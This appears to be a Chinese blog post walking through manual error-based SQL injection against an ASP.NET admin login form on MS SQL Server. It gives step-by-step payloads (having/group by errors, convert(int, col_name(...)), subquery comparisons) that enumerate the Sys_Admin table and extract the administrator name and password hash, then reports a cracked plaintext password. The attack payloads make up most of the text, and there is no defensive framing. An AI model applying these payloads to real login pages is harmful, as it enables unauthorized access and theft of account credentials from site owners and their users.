侧边栏壁纸
博主头像
落叶人生博主等级

走进秋风,寻找秋天的落叶

  • 累计撰写 130562 篇文章
  • 累计创建 28 个标签
  • 累计收到 9 条评论
标签搜索

目 录CONTENT

文章目录

后台登陆框post注入实战

2023-04-12 星期三 / 0 评论 / 0 点赞 / 74 阅读 / 2746 字

后台登陆框post注入按照注入的方式属于post,和前台搜索型post注入、文本框注入类似,由于目前主流的注入工具除了穿山甲等较新工具以外几乎都是get注入,尤其是对于这种后台账户型post注入式无能

.

 

.后台登陆框post注入按照注入的方式属于post,和前台搜索型post注入、文本框注入类似,由于目前主流的注入工具除了穿山甲等较新工具以外几乎都是get注入,尤其是对于这种后台账户型post注入式无能为力的,所以手工注入就显得尤为重要了,今天就用实战说明一下大家不大在意的post注入的手注方法。(以后也会补充一个cookie注入的实战例子)..http://xxx.com/login.aspx.

.1.爆数据库的表段和相关字段..' having 1=1--.

.说明有表名叫 Sys_Admin 字段有 password..2.爆Sys_Admin下的其他字段。..' group by Sys_Admin.Password having 1=1--..不知道为何没法用这种方式继续爆表段的其他字段..失败。..3 换种方式爆Sys_Admin表段的其他字段..1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),1) from Sys_Admin)) and '1'='1.

.1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),2) from Sys_Admin)) and '1'='1.

.这就是我们一开始就和表段一起爆出来的密码字段。..1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),3) from Sys_Admin)) and '1'='1.

.在将 nvarchar 值 'Name' 转换成数据类型 int 时失败。..由结果可以推断管理员账户是在name字段中,密码是在password字段中。..4.然后就是分别爆字段内容了..' and (select top 1 Sys_Admin.Name from Sys_Admin)>0--.

.所以爆出来的是admin..' and (select top 1 Sys_Admin.Password from Sys_Admin)>0--.

.爆出来的密码是 D14E21B3210EF7C7EB42EC9740A1EE7E..经过破解是:pjxh3100312..所有后台账户和密码是 admin pjxh3100312.

.经过分析还有实例联系说明,手工注入的方法不能死板,可以多种方法结合一起使用,学习多种数据库的使用是非常有必要的。.. ..

广告 广告

评论区